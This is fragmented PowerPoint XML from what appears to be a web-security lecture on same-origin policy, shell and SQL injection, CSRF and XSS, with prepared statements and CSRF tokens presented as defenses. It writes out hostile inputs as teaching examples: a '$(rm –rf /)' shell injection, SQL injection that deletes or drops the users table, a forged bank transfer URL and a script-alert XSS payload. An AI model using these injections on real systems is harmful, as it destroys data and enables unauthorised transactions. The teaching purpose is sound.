            <a:ext cx="492479" cy="4924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11" y="3997678"/>
            <a:ext cx="753015" cy="75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6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2698830"/>
            <a:ext cx="3380862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$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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    function (data) { alert(data) });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Review | AJAX (jQuery style)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07825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599" y="1295400"/>
            <a:ext cx="300595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34957" y="2554069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dirty="0" smtClean="0"/>
              <a:t>mail.com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4011441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31952" y="2184737"/>
            <a:ext cx="3380862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&lt;script&gt;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$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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      function (data) { alert(data) });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49497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267200"/>
            <a:ext cx="259878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021556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5062014"/>
            <a:ext cx="3467265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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 3 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11" y="4011441"/>
            <a:ext cx="753015" cy="753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" y="2503498"/>
            <a:ext cx="390663" cy="390663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267733" y="2413667"/>
            <a:ext cx="2209800" cy="983397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http://gmail.com/ says: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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 3}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0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99258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057228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3920316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31952" y="2111718"/>
            <a:ext cx="3321743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&lt;script&gt;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$.get(‘http://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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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function (data) { alert(data); }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51021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419600"/>
            <a:ext cx="259878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173956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5214414"/>
            <a:ext cx="346726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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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43800" y="4355068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742840"/>
            <a:ext cx="609960" cy="60996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827110"/>
            <a:ext cx="621268" cy="6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80" y="2288247"/>
            <a:ext cx="752120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257" y="2782669"/>
            <a:ext cx="3321743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$.get(‘http://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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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     function (data) { alert(data); }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" y="2626024"/>
            <a:ext cx="304980" cy="3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6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09800" y="3173241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45116" y="2212271"/>
            <a:ext cx="3766416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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img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/img.png”/&gt;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1469" y="3260173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80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55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09800" y="3173241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45116" y="2212271"/>
            <a:ext cx="3766416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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img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44163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3733800"/>
            <a:ext cx="2420856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5488156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4528614"/>
            <a:ext cx="346726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&lt;89&gt;PNG^M ...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486150"/>
            <a:ext cx="495299" cy="49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8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1469" y="3581400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80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209800" y="3541412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45116" y="2577971"/>
            <a:ext cx="3854581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&lt;script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122549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￼The Ghost In The Browser Analysis of Web-based Malware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Niels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Provos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Dean McNamee </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Panayiotis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mavrommatis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KeWang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Nagendra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Modadugu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3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09800" y="3541958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27746" y="47973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114800"/>
            <a:ext cx="2295821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/chat.js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150837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4873543"/>
            <a:ext cx="346726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$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chat.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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7821" y="2781353"/>
            <a:ext cx="346726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$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chat.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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" y="2474095"/>
            <a:ext cx="430582" cy="4305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45116" y="2577971"/>
            <a:ext cx="3854581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&lt;script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151933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2286000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3693020"/>
            <a:ext cx="753015" cy="75301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209800" y="42639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96654" y="3581400"/>
            <a:ext cx="2537874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093416" y="5410200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7821" y="2781353"/>
            <a:ext cx="346726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$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chat.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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" y="2474095"/>
            <a:ext cx="430582" cy="43058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41986" y="4419600"/>
            <a:ext cx="3830414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HTTP/1.1 200 OK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…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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: { from: “Bob”,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean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31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099566"/>
            <a:ext cx="621268" cy="6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36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1469" y="3858161"/>
            <a:ext cx="811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  <a:endParaRPr lang="en-US" sz="8000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209800" y="35814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45116" y="2617959"/>
            <a:ext cx="3754554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&lt;iframe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/chat”/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10498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185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213776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4252184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629669"/>
            <a:ext cx="609960" cy="60996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209800" y="35814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45116" y="2617959"/>
            <a:ext cx="3754554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&lt;iframe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/chat”/&gt;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09800" y="442865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96654" y="3746110"/>
            <a:ext cx="2105063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/chat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075536" y="6324600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45116" y="4504853"/>
            <a:ext cx="3754554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&lt;script&gt;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$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chat.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/’,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    function (data) { alert(data); });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&lt;/script&gt;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3942" y="2683254"/>
            <a:ext cx="3294451" cy="5847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$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chat.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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6614" y="2187901"/>
            <a:ext cx="3551933" cy="1219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" y="1981200"/>
            <a:ext cx="430582" cy="43058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3942" y="2683255"/>
            <a:ext cx="3294451" cy="646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2613"/>
            <a:ext cx="484608" cy="48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0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52571" y="2286000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3693020"/>
            <a:ext cx="753015" cy="75301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209800" y="42639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96654" y="3581400"/>
            <a:ext cx="2537874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093416" y="5410200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3942" y="2683254"/>
            <a:ext cx="3294451" cy="5847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$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chat.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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1986" y="4419600"/>
            <a:ext cx="3830414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HTTP/1.1 200 OK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…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: { from: “Bob”,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean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2613"/>
            <a:ext cx="484608" cy="4846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614" y="2187901"/>
            <a:ext cx="3551933" cy="1219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" y="1981200"/>
            <a:ext cx="430582" cy="430582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115332" y="2209800"/>
            <a:ext cx="2704068" cy="1110734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http://gmail.com/ says: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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: { from: “Bob”, 	      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: “Hi!”}}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65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1447800"/>
            <a:ext cx="461697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09800" y="31242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96654" y="2716054"/>
            <a:ext cx="3459601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dirty="0" smtClean="0"/>
              <a:t>/home/user/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45816" y="51816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05400" y="3373002"/>
            <a:ext cx="1911101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Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Music</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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12540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3400" y="1447800"/>
            <a:ext cx="461697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09800" y="31242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96654" y="2716054"/>
            <a:ext cx="3332964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dirty="0" smtClean="0"/>
              <a:t>$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /)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Documents and Settings\Eric\Local Settings\Temporary Internet Files\Content.IE5\J3WCMIIA\hourglass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746" y="3464853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Eric\Local Settings\Temporary Internet Files\Content.IE5\VS4ZJVU9\poof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950" y="2574265"/>
            <a:ext cx="23717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6244" y="3464852"/>
            <a:ext cx="726756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962400" y="4648200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28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Confusing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programmer thought user</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>would supply data,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but instead got (and unintentionally executed) code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common and dangerous class of vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shell Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control-flow Hijacking (Buffer overflows)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295400"/>
            <a:ext cx="411042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1400" y="1219200"/>
            <a:ext cx="726756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9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Structured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Language to ask (“query”) databases questions:</a:t>
            </a:r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How many users live in Ann Arbor?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94360" lvl="2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“SELECT COUNT(*) FROM `users` WHERE location = ‘Ann Arbor’”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="594360" lvl="2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 smtClean="0"/>
              <a:t>Is there a user with username “bob” and password “abc123”?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="59436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“SELECT * FROM `users` WHERE username=‘bob’ and 	password=‘abc123’”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="594360" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Burn it down!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="594360" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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“DROP TABLE `users`”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94360" lvl="2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94360" lvl="2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94360" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-U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5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937760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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sz="1800" dirty="0" smtClean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800" dirty="0" smtClean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800" dirty="0" smtClean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80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40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800" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr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sz="1800" dirty="0" smtClean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8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Internet essential for everyday life: ecommerce, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware used to steal bank accounts or credit cards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>underground economy is very profitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internet threats are changing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>remote exploitation and firewalls are yesterday</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser is a complex computation environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adversaries exploit browser to install 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458200" cy="4937760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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sz="1800" dirty="0" smtClean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800" dirty="0" smtClean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800" dirty="0" smtClean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80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40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2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800" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean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274320" lvl="2" indent="-274320">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>city </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ann Arbor’;  DELETE FROM `users` WHERE 1=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a: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1800" dirty="0" smtClean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SELECT * FROM `users` WHERE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location=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ann Arbor’;  DELETE FROM `users` WHERE 1=‘1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600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr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64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Injection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sure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> gets interpreted as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>data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Basic approach: escape control characters (single quotes, escaping characters, comment characters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Better approach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>statements – declare what is data!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1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$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&gt;prepare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`users` WHERE location=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7432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execute(array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	// Data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11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you log in to bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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22" y="320040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191674"/>
            <a:ext cx="682671" cy="6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8177" y="27432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ank.com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45816" y="28136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2133600"/>
            <a:ext cx="461218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POST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login?user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bob&amp;pass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=abc123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09800" y="4088187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7183" y="3124200"/>
            <a:ext cx="2543645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Set-Cookie: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843863" y="1353255"/>
            <a:ext cx="2245816" cy="114300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345102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22" y="320040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191674"/>
            <a:ext cx="682671" cy="6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8177" y="27432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ank.com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3115147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2133600"/>
            <a:ext cx="25908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/account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09800" y="45720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7183" y="3608013"/>
            <a:ext cx="2636680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$378.42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843863" y="1353255"/>
            <a:ext cx="2245816" cy="114300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16405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Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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22" y="320040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191674"/>
            <a:ext cx="682671" cy="6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8177" y="27432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ank.com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34290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2447453"/>
            <a:ext cx="484078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badguy&amp;amt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=100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09800" y="45720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7182" y="3608013"/>
            <a:ext cx="2919601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Transfer complete: -$100.00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843863" y="1353255"/>
            <a:ext cx="2245816" cy="114300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fde874 = bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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" y="1309718"/>
            <a:ext cx="726756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24977" y="1548846"/>
            <a:ext cx="447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me!!!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http://bank.com/transfer?to=badguy&amp;amt=100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7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“authenticate” each user action </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>originates from our site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One way: each “action” gets a token associated with it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On a new action (page), verify the token is present and correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker can’t find token for another user, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and thus can’t make actions on the user’s behalf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421132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CSRF Defenses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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122" y="3200400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4191674"/>
            <a:ext cx="682671" cy="68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08177" y="27432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ank.com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4105747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02115" y="3124200"/>
            <a:ext cx="538928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joe&amp;amt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=25&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>token=8d64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209800" y="5248747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07182" y="4284760"/>
            <a:ext cx="2919601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….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Transfer complete: -$25.00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843863" y="1353255"/>
            <a:ext cx="2245816" cy="114300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fde874 = bob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258669"/>
            <a:ext cx="527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 $25 to Joe:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://bank.com/transfer?to=joe&amp;amt=25&amp;token=8d64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209800" y="3021387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07183" y="2057400"/>
            <a:ext cx="2466253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Set-Cookie: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token=8d64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2057400"/>
            <a:ext cx="388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&lt;input type="hidden" name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=”token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8d64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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4646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1447800"/>
            <a:ext cx="487024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09800" y="31242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96654" y="2716054"/>
            <a:ext cx="2702984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dirty="0" smtClean="0"/>
              <a:t>Bob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45816" y="43434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3373002"/>
            <a:ext cx="1911101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Hello, Bob!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0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1447800"/>
            <a:ext cx="487024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09800" y="31242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96654" y="2716054"/>
            <a:ext cx="3536546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dirty="0" smtClean="0"/>
              <a:t>&lt;u&gt;Bob&lt;/u&gt;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45816" y="43434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105400" y="3373002"/>
            <a:ext cx="2046266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Hello, &lt;u&gt;Bob&lt;/u&gt;!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8600" y="1447800"/>
            <a:ext cx="4870244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2716293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209800" y="3124200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96654" y="2716054"/>
            <a:ext cx="5043175" cy="36933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dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert(‘XSS’)&lt;/script&gt;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245816" y="4343400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33800" y="3373002"/>
            <a:ext cx="3552896" cy="92333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/>
